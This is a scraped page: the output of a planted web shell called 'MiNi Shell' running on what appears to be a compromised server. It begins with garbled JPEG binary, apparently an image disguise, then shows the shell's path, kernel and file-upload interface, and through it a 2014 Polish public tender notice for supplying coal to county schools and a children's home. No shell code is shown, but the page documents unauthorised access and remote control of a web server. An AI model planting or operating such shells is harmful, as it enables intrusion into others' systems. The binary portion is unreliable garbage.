JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140915/196279-N-2014.html

<p class="kh_header"><b>Zgierz: Dostawa ekogroszku, miału węglowego na sezon grzewczy 2014/2015 r. do jednostek organizacyjnych podległych Zarządowi Powiatu Zgierskiego</b><br>
<b>Numer ogłoszenia: 196279 - 2014; data zamieszczenia: 15.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Spółka Infrastrukturalna Spółka z ograniczoną odpowiedzialnością , ul. Długa 49, 95-100 Zgierz, woj. łódzkie, tel. 887 555 510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psi.powiat.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa ekogroszku, miału węglowego na sezon grzewczy 2014/2015 r. do jednostek organizacyjnych podległych Zarządowi Powiatu Zgierskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup wraz z transportem, dostawą oraz załadunkiem 
i rozładunkiem ekogroszku, miału węglowego na sezon grzewczy 2014/2015 do następujących jednostek organizacyjnych podległych Zarządowi Powiatu Zgierskiego: 
1)	Zespół Szkół Licealno-Gimnazjalnych w Głownie ul. Kościuszki 10, 95-015 Głowno, 
2)	Zespół Szkół Nr 1 im. prof. R.A. Cebertowicza w Głownie ul. Kopernika 24/26, 95-015 Głowno,
3)	Zespół Szkół nr 1 im.  J. S. Cezaka ul. Długa 89/91, 95-100 Zgierz, 
4)	Dom Dziecka Jedlicze - Grotniki ul. Graniczna 1, 95-073 Grotniki -Jedlicze A, 
5)	Zespół Szkół Ogólnokształcących im. Stanisława Staszica w Zgierzu ul. 3-go Maja 41, 95-100 Zgierz.
2.	Przedmiotem zamówienia jest zakup wraz z transportem, dostawą oraz załadunkiem 
i rozładunkiem:
a)	Ekogroszku w sezonie grzewczym 2014/2015 w szacowanej ilości około 380 ton luzem - groszek energetyczny ekogroszek 31-GkII-26/7 wg. PN-82/G-97003, lub  równoważny  
o następujących parametrach:
- wartość opałowa Q nie mniejsza niż 27000 kJ/kg
- uziarnienie ( mm )       od 5 do 25
- zawartość popiołu       max. 8%
- zawartość siarki           max. 0,6%
- spiekalność RI               poniżej 3
- wilgotność                     max. 15%
b)	Zamawiający dopuszcza rozwiązania równoważne opisywanym powyżej czyli oferowany produkt  musi posiadać parametry oraz właściwości takie same lub lepsze. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest zobowiązany wykazać, że  oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.
c)	Zamawiający informuje, że dostawa ekogroszku  będzie odbywać się w następujący sposób do poszczególnych jednostek  i w określonych ilościach:
Tabela 
L.p.	Nazwa jednostki	Szacowana ilość przedstawiona zgodnie z podziałem na jednostki 	Wymagana jednorazowa dostawa
spowodowana ograniczeniami infrastruktury
1	Zespół Szkół Licealno-Gimnazjalnych 
w Głownie ul. Kościuszki 10, 95-015 Głowno	85 ton luzem	max do 5 ton	brak miejsca składowania, rozładunek bezpośrednio do zsypu kotłowni
2	Zespół Szkół Nr 1 im. prof. R.A. Cebertowicza 
w Głownie ul. Kopernika 24/26, 95-015 Głowno	140 ton luzem	max do 25 ton	rozładunek do budynku kotłowni
3	Zespół Szkół nr 1 im.  J. S. Cezaka ul. Długa 89/91, 95-100 Zgierz	105 ton luzem	max do 5 ton	brak miejsca składowania, rozładunek bezpośrednio do zsypu kotłowni, infrastruktura ciepłownicza  umiejscowiona pod powierzchnią składowania
4	Dom Dziecka Jedlicze -Grotniki  ul. Graniczna 1, 95-073 Grotniki - Jedlicze A	50 ton luzem	max 25 ton	rozładunek do budynku kotłowni

d)	miału węglowego w sezonie grzewczym 2014/2015 w szacowanej ilości  około 120 ton luzem   II kl. 25   lub równoważny o następujących parametrach:

- kaloryczność nie mniejsza niż 25000 kJ/kg
- uziarnienie ( mm )    0 do 20
- siarka  poniżej           0,6%
- popiół poniżej           14%
- wilgotność poniżej   16%

e)	Zamawiający informuje, że dostawa miału węglowego do kotłowni Zespołu Szkół Ogólnokształcących im. S. Staszica w Zgierzu ul. 3-go Maja 41, 95-100 Zgierz została wyszacowana w ilości 120 ton luzem. Ze względu na brak miejsca składowania rozładunek musi odbywać się bezpośrednio do zsypu czyli jednorazowa dostawa miału węglowego nie może przekroczyć ilości  max. do 5 ton. 
f)	Zamawiający informuje, że jednorazowe dostawy w granicach 5 ton zabezpieczają potrzeby opałowe na około 2 tygodnie.

3.	Zamawiający informuje, że dostawy opału w trakcie realizacji zamówienia będą odbywać się sukcesywnie, zgodnie z zapotrzebowaniem Zamawiającego.
4.	Zamawiający informuje, że zgłoszenia zapotrzebowania na dostawę opału będą odbywać się drogą elektroniczną lub faksem bezpośrednio od Zamawiającego.
5.	Dostawa opału odbywać się będzie nie później niż w ciągu  48 godzin od wysłania zamówienia przez Zamawiającego.
6.	Na żądanie Zamawiającego Wykonawca zobowiązany będzie do każdej partii dostarczonego opału załączyć dokument potwierdzający jakość dostarczanego opału.
7.	Wykonawca zobowiązany będzie każdorazowo wraz z dostawą opału przekazać Zamawiającemu drogą elektroniczną lub faksem dokument dostawy określający ilość i kod CN.
8.	W przypadku pojawienia się wątpliwości dotyczącej jakości dostarczanego opału Zamawiający zastrzega sobie prawo dokonania ekspertyzy w profesjonalnym, niezależnym laboratorium na koszt Wykonawcy. Jeśli wynik ekspertyzy okaże się negatywny Wykonawca zobowiązany będzie do  wymiany wadliwej partii dostawy na swój koszt. 
9.	Wykonawca zobowiązany będzie wystawiać fakturę za każdą dokonaną dostawę w terminie 7 dni od dnia dokonanej dostawy.
10.	Zamawiający informuje, że podane ilości opału są ilościami orientacyjnymi, ustalonymi na podstawie zużycia w okresie ostatnich 12 miesięcy przed wszczęciem postępowania, 
o którym mowa w ust. 1 oraz przewidywanego zapotrzebowania, z uwzględnieniem zmian ilościowych  oraz prognozowanego zużycia przy maxmalnych założeniach na sezon grzewczy 2014/2015. Przyjęte zapotrzebowanie jest niezbędne w celu porównania ofert i wyboru oferty najkorzystniejszej. Podane maxmalne ilości ekogroszku, miału, mogą ulec zmianie, przy czym Zamawiający gwarantuje odbiór  minimum 70 % łącznej ilości opału wskazanego w przedmiocie zamówienia. Wykonawcy nie służy roszczenie o realizację dostaw w wielkościach podanych w tabeli.
11.	Zamawiający zastrzega sobie prawo do zważenia dostarczonego opału, do sprawdzenia parametrów dostarczonego opału, celem sprawdzenia zgodności wymaganych parametrów.
12.	W cenie jednostkowej za opał Wykonawca jest zobowiązany skalkulować wszystkie koszty  ponoszone w związku z wykonywaniem przedmiotu zamówienia, w tym między innymi koszty związane z zatrudnieniem dodatkowych osób, koszty ubezpieczenia, koszty transportu, koszty rozładunku we wskazane miejsce, inne koszty niezbędne dla prawidłowej realizacji przedmiotu zamówienia.
13.	Cena nie może zawierać podatku akcyzowego, gdyż zgodnie z zapisami ustawy z dnia 6 grudnia 2008 r. o podatku akcyzowym ( tekst jednolity Dz. U. z 2014 r. poz. 752 - zwana dalej ustawą ), a w szczególności  art. 31a mówi o zwolnieniu z płacenia podatku akcyzowego przez te jednostki jako odbiorców ostatecznych.
14.	Zamawiający żąda złożenia wraz z ofertą przez Wykonawcę  Listy Wykonawców należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z póź. zm.) w przypadku braku przynależności do grupy kapitałowej Wykonawca składa odpowiednią informację zgodną ze stanem faktycznym.
15.	Zamawiający nie przewiduje udzielania zamówień uzupełniających. 
16.	Zamawiający  nie dopuszcza składanie ofert częściowych.
17.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
18.	 Zamawiający nie przewiduje zawarcia umowy ramowej i nie ustanawia dynamicznego systemu zakupów oraz nie stosuje aukcji elektronicznej przy wyborze najkorzystniejszej oferty.
19.	Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla Wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne.
20.	Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.11.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 15.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 6 700,00 zł.
2.	Wadium musi być wniesione przed upływem terminu do składania ofert. Na poleceniu przelewu należy wpisać: Wadium - opał sezon 2014/2015 . W przypadku wnoszenia wadium w innych formach niż w pieniądzu - oryginał dokumentu (zachowującego ważność przez cały okres, w którym Wykonawca jest związany ofertą) wystawionego na rzecz Zamawiającego tj. Powiatowa Spółka Infrastrukturalna Sp. z o. o. ul. Długa 49, 95-100 Zgierz, należy złożyć 
w pokoju nr 203B.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
Wadium wnoszone w pieniądzu wpłaca się WYŁĄCZNIE PRZELEWEM na rachunek bankowy Zamawiającego  BANK SPÓŁDZIELCZY W ZGIERZU ul. Długa 62 A, 95-100 Zgierz; nr konta bankowego: 35 8783 0004 0026 0765 2000 0002;
4.	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany powyżej.
5.	W dokumentach potwierdzających wniesienie wadium w formie niepieniężnej (gwarancje, poręczenia) winny być wprost wskazane przesłanki zawarte w art. 46 ust. 4a i 5 Ustawy.
6.	Każda forma wadium musi gwarantować Zamawiającemu natychmiastowe 
i bezwarunkowe uzyskanie kwoty wadium, po zaistnieniu przesłanek zatrzymania wadium, dlatego gwarancje i poręczenia wnoszone, jako wadium powinny być nieodwołalne 
w trakcie trwania terminu związania ofertą i nie mogą być zastrzeżone pod warunkiem.
7.	Dokumenty potwierdzające wniesienie wadium w formie niepieniężnej nie mogą być uzupełniane w trybie art. 26 ust. 3 Ustawy i ich brak powodować będą odrzucenie oferty. 
8.	Okoliczności i zasady zwrotu wadium określa Ustawa.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
1)	zmiana adresu/siedziby Zamawiającego/Wykonawcy;
2)	zmiana osób występujących po stronie Zamawiającego/Wykonawcy;
3)	zmiana terminów, o których mowa w § 2 realizacji przedmiotu umowy, ewentualne wstrzymanie/wznowienie, przedłużenie realizacji umowy może wystąpić w następujących przypadkach:
a)	w terminie siedmiu dni przed terminem zakończenia umowy, jeżeli warunki atmosferyczne potwierdzone prognozami meteorologicznymi wymagają w terminie dłuższym niż, określony w umowie, świadczenia usługi zgodnie z przedmiotem zamówienia, pod warunkiem, że maksymalna wartość zobowiązania umowy zawartej 
z Wykonawcą nie ulegnie zmianie;
b)	przedłużenie procedury przetargowej;
c)	działania sił natury uznane za stan klęski żywiołowej, katastrofy naturalnej lub awarii technicznej, których skutki zagrażają życiu lub zdrowiu dużej liczby osób, mieniu w wielkich rozmiarach albo środowisku na znacznych obszarach.
4)	Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy jeśli przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy;
5)	 Zmiana postanowień umowy w związku ze zmianą stawki podatku od towarów i usług (VAT) 
w przypadku zmiany obowiązujących, w tym w zakresie przepisów;
6)	Zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności;
7)	Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania zaistnienia powyższych okoliczności;
8)	Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.psi.powiat.zgierz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Spółka Infrastrukturalna Sp. z o. o. ul. Długa 49, 95-100 Zgierz,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2014 godzina 10:00, miejsce: Powiatowa Spółka Infrastrukturalna Sp. z o. o. ul. Długa 49, 95-100 Zgierz
budynek B pokój 203 B piętro II budynek..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com